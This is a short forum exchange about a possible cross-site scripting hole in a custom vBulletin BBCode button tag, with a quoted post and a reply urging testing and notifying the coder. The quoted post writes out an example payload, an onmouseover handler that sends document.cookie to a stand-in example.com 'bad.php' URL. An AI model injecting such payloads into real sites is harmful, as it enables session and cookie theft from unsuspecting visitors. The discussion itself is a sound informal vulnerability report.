Quote:
Originally Posted by Reven
I don't know whether or not vBulletin cleans the {param} value, but it looks at first glance like anything can be injected into the HTML of the page through the first tag.
e.g. [button=" onmouseover="window.location.href='http://www.example.com/bad.php?cookies=' + document.cookie"]Click me so I can steal your cookies![/button] would make a button which, when focused on with the mouse, would redirect the user to a site which steals their cookies.
I may be wrong though...
|
Would you please test your theory and let us know if things are out of line there? We deserve at least a warning and seeing how you brought it up I think you should be the one to test it......lol
I agree though the information should be edited until it can be confirmed maybe notify the coder and let him figure it all out.